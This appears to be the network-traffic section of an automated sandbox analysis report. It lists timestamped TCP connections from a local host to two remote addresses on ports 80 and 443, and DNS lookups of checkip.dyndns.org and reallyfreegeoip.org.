Jan 10, 2025 22:32:39.468260050 CET	443	49737	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:39.468597889 CET	443	49737	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:39.518584967 CET	49737	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:39.537631989 CET	49737	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:39.579334974 CET	443	49737	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:39.651195049 CET	443	49737	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:39.651249886 CET	443	49737	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:39.651304007 CET	49737	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:39.661518097 CET	49737	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:39.668000937 CET	49735	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:39.672843933 CET	80	49735	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:40.201416969 CET	80	49735	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:40.203308105 CET	49739	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:40.203363895 CET	443	49739	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:40.203903913 CET	49739	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:40.204263926 CET	49739	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:40.204277992 CET	443	49739	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:40.346721888 CET	49735	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:40.355144978 CET	49740	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:40.359985113 CET	80	49740	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:40.360259056 CET	49740	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:40.360259056 CET	49740	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:40.367034912 CET	80	49740	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:40.685574055 CET	443	49739	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:40.688137054 CET	49739	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:40.688179970 CET	443	49739	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:40.839610100 CET	443	49739	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:40.839695930 CET	443	49739	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:40.839749098 CET	49739	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:40.840146065 CET	49739	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:40.843784094 CET	49735	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:40.844887018 CET	49741	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:40.849874020 CET	80	49741	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:40.849958897 CET	49741	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:40.850085020 CET	49741	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:40.850119114 CET	80	49735	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:40.850178003 CET	49735	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:40.854970932 CET	80	49741	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:40.971826077 CET	80	49740	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:40.976886988 CET	49740	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:40.981828928 CET	80	49740	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:41.395468950 CET	80	49741	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:41.396720886 CET	49742	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:41.396783113 CET	443	49742	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:41.396967888 CET	49742	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:41.398030043 CET	49742	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:41.398049116 CET	443	49742	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:41.522239923 CET	49741	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:41.878063917 CET	443	49742	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:41.890436888 CET	49742	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:41.890482903 CET	443	49742	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:41.914351940 CET	80	49740	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:42.032967091 CET	443	49742	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:42.033041000 CET	443	49742	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:42.033175945 CET	49742	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:42.122489929 CET	80	49740	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:42.124735117 CET	49740	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:42.152789116 CET	49742	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:42.398902893 CET	49743	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:42.403863907 CET	80	49743	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:42.403975964 CET	49743	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:42.405913115 CET	49743	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:42.410722971 CET	80	49743	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:42.632333994 CET	49744	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:42.632392883 CET	443	49744	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:42.632458925 CET	49744	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:42.637737989 CET	49744	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:42.637767076 CET	443	49744	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:43.098882914 CET	443	49744	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:43.099039078 CET	49744	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:43.100361109 CET	49744	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:43.100392103 CET	443	49744	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:43.100684881 CET	443	49744	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:43.171772957 CET	49744	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:43.215328932 CET	443	49744	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:43.280731916 CET	443	49744	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:43.280900002 CET	443	49744	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:43.281100035 CET	49744	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:43.283687115 CET	49744	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:43.287910938 CET	49740	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:43.293647051 CET	80	49740	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:43.348737955 CET	80	49743	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:43.358709097 CET	49745	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:43.358752012 CET	443	49745	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:43.358825922 CET	49745	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:43.359143019 CET	49745	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:43.359159946 CET	443	49745	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:43.534213066 CET	49743	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:43.802998066 CET	80	49740	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:43.804773092 CET	49746	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:43.804831982 CET	443	49746	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:43.804950953 CET	49746	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:43.805255890 CET	49746	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:43.805265903 CET	443	49746	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:43.843849897 CET	443	49745	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:43.845326900 CET	49745	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:43.845349073 CET	443	49745	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:43.940649033 CET	49740	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:43.994678020 CET	443	49745	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:43.994748116 CET	443	49745	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:43.994988918 CET	49745	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:43.995354891 CET	49745	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:43.998855114 CET	49743	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:43.999839067 CET	49747	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:44.005121946 CET	80	49743	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:44.005182028 CET	49743	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:44.006021976 CET	80	49747	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:44.006091118 CET	49747	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:44.006217957 CET	49747	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:44.012290001 CET	80	49747	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:44.265898943 CET	443	49746	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:44.267643929 CET	49746	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:44.267676115 CET	443	49746	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:44.417488098 CET	443	49746	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:44.417541027 CET	443	49746	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:44.417608023 CET	49746	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:44.418162107 CET	49746	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:44.421334028 CET	49740	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:44.422420025 CET	49748	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:44.426410913 CET	80	49740	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:44.426570892 CET	49740	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:44.427352905 CET	80	49748	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:44.427427053 CET	49748	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:44.427532911 CET	49748	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:44.432368994 CET	80	49748	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:44.527834892 CET	80	49747	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:44.529191017 CET	49749	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:44.529239893 CET	443	49749	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:44.529306889 CET	49749	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:44.529548883 CET	49749	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:44.529562950 CET	443	49749	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:44.623946905 CET	49747	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:44.900753975 CET	80	49748	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:44.902194023 CET	49750	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:44.902225018 CET	443	49750	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:44.902574062 CET	49750	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:44.902872086 CET	49750	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:44.902884007 CET	443	49750	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:44.991919041 CET	443	49749	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:44.993653059 CET	49749	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:44.993669033 CET	443	49749	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:45.018608093 CET	49748	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:45.134325981 CET	443	49749	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:45.134416103 CET	443	49749	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:45.134577990 CET	49749	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:45.134941101 CET	49749	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:45.138019085 CET	49747	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:45.139168978 CET	49751	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:45.143007994 CET	80	49747	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:45.143086910 CET	49747	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:45.144134045 CET	80	49751	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:45.144201994 CET	49751	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:45.144304037 CET	49751	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:45.149118900 CET	80	49751	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:45.358365059 CET	443	49750	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:45.360048056 CET	49750	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:45.360070944 CET	443	49750	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:45.501905918 CET	443	49750	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:45.501975060 CET	443	49750	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:45.502074003 CET	49750	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:45.519331932 CET	49750	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:45.531773090 CET	49753	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:45.536684990 CET	80	49753	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:45.536766052 CET	49753	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:45.537348032 CET	49753	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:45.542299986 CET	80	49753	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:46.019151926 CET	80	49753	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:46.020551920 CET	49754	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:46.020617962 CET	443	49754	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:46.020685911 CET	49754	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:46.021013021 CET	49754	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:46.021028042 CET	443	49754	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:46.066019058 CET	49753	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:46.122658014 CET	80	49751	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:46.123836040 CET	49755	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:46.123878002 CET	443	49755	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:46.123951912 CET	49755	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:46.124181032 CET	49755	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:46.124192953 CET	443	49755	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:46.175338030 CET	49751	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:46.481267929 CET	443	49754	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:46.482940912 CET	49754	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:46.482969999 CET	443	49754	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:46.578423023 CET	443	49755	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:46.580240011 CET	49755	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:46.580277920 CET	443	49755	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:46.634799957 CET	443	49754	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:46.634861946 CET	443	49754	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:46.634916067 CET	49754	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:46.635509968 CET	49754	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:46.641275883 CET	49753	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:46.642117977 CET	49757	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:46.646552086 CET	80	49753	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:46.646677017 CET	49753	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:46.646944046 CET	80	49757	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:46.647052050 CET	49757	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:46.647233963 CET	49757	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:46.652043104 CET	80	49757	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:46.711447001 CET	443	49755	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:46.711519003 CET	443	49755	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:46.711610079 CET	49755	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:46.712110996 CET	49755	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:46.716320992 CET	49751	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:46.717926025 CET	49758	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:46.721419096 CET	80	49751	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:46.722045898 CET	49751	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:46.722662926 CET	80	49758	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:46.722785950 CET	49758	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:46.723332882 CET	49758	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:46.728058100 CET	80	49758	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:47.121692896 CET	80	49757	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:47.122910023 CET	49760	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:47.122970104 CET	443	49760	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:47.123114109 CET	49760	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:47.123389959 CET	49760	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:47.123404026 CET	443	49760	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:47.174841881 CET	49757	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:47.177434921 CET	80	49758	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:47.178659916 CET	49761	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:47.178699017 CET	443	49761	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:47.178771973 CET	49761	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:47.179024935 CET	49761	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:47.179035902 CET	443	49761	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:47.221693039 CET	49758	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:47.587061882 CET	443	49760	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:47.588709116 CET	49760	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:47.588747025 CET	443	49760	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:47.665726900 CET	443	49761	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:47.667536020 CET	49761	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:47.667567968 CET	443	49761	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:47.729939938 CET	443	49760	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:47.730005026 CET	443	49760	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:47.730088949 CET	49760	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:47.730578899 CET	49760	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:47.734261990 CET	49757	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:47.735277891 CET	49763	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:47.739336014 CET	80	49757	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:47.739392996 CET	49757	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:47.740098000 CET	80	49763	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:47.740242004 CET	49763	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:47.740359068 CET	49763	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:47.745131969 CET	80	49763	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:47.791395903 CET	443	49761	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:47.791476011 CET	443	49761	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:47.791591883 CET	49761	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:47.792022943 CET	49761	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:47.795541048 CET	49758	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:47.796667099 CET	49764	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:47.800625086 CET	80	49758	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:47.800760031 CET	49758	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:47.801595926 CET	80	49764	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:47.801713943 CET	49764	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:47.801947117 CET	49764	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:47.806737900 CET	80	49764	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:48.195493937 CET	80	49763	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:48.197654963 CET	49766	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:48.197691917 CET	443	49766	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:48.197767973 CET	49766	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:48.198080063 CET	49766	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:48.198096037 CET	443	49766	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:48.237344027 CET	49763	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:48.595371962 CET	80	49764	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:48.596750021 CET	49767	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:48.596791029 CET	443	49767	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:48.597006083 CET	49767	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:48.597260952 CET	49767	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:48.597274065 CET	443	49767	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:48.643626928 CET	49764	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:48.662347078 CET	443	49766	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:48.672873974 CET	49766	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:48.672909021 CET	443	49766	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:48.799642086 CET	443	49766	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:48.799717903 CET	443	49766	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:48.799777031 CET	49766	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:48.800647974 CET	49766	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:48.804296970 CET	49763	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:48.805293083 CET	49768	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:48.810075045 CET	80	49768	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:48.810167074 CET	49768	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:48.810308933 CET	49768	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:48.811384916 CET	80	49763	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:48.811439037 CET	49763	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:48.815052986 CET	80	49768	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:49.061956882 CET	443	49767	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:49.072216988 CET	49767	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:49.072240114 CET	443	49767	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:49.210309982 CET	443	49767	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:49.210390091 CET	443	49767	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:49.210747957 CET	49767	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:49.210958004 CET	49767	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:49.289946079 CET	80	49768	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:49.303206921 CET	49770	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:49.303247929 CET	443	49770	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:49.303324938 CET	49770	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:49.309551001 CET	49770	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:49.309564114 CET	443	49770	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:49.331057072 CET	49768	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:49.369889975 CET	49764	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:49.370001078 CET	49741	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:49.794364929 CET	443	49770	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:49.804989100 CET	49770	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:49.805016994 CET	443	49770	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:49.940043926 CET	443	49770	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:49.940110922 CET	443	49770	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:49.940884113 CET	49770	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:49.941627026 CET	49770	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:49.948239088 CET	49768	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:49.950352907 CET	49771	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:49.953294992 CET	80	49768	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:49.953342915 CET	49768	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:49.955183029 CET	80	49771	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:49.955333948 CET	49771	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:49.955333948 CET	49771	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:49.960112095 CET	80	49771	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:50.421808004 CET	80	49771	193.122.130.0	192.168.2.4
Jan 10, 2025 22:32:50.423376083 CET	49772	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:50.423427105 CET	443	49772	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:50.423541069 CET	49772	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:50.423911095 CET	49772	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:50.423924923 CET	443	49772	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:50.472623110 CET	49771	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:50.882441998 CET	443	49772	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:50.890512943 CET	49772	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:50.890542030 CET	443	49772	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:51.019562006 CET	443	49772	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:51.019633055 CET	443	49772	104.21.48.1	192.168.2.4
Jan 10, 2025 22:32:51.019835949 CET	49772	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:51.020126104 CET	49772	443	192.168.2.4	104.21.48.1
Jan 10, 2025 22:32:51.139404058 CET	49771	80	192.168.2.4	193.122.130.0
Jan 10, 2025 22:32:51.139491081 CET	49748	80	192.168.2.4	193.122.130.0

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 22:32:35.523581028 CET	50796	53	192.168.2.4	1.1.1.1
Jan 10, 2025 22:32:35.531264067 CET	53	50796	1.1.1.1	192.168.2.4
Jan 10, 2025 22:32:38.913901091 CET	51523	53	192.168.2.4	1.1.1.1
Jan 10, 2025 22:32:38.922132015 CET	53	51523	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 22:32:35.523581028 CET	192.168.2.4	1.1.1.1	0x1029	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:32:38.913901091 CET	192.168.2.4	1.1.1.1	0xf392	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

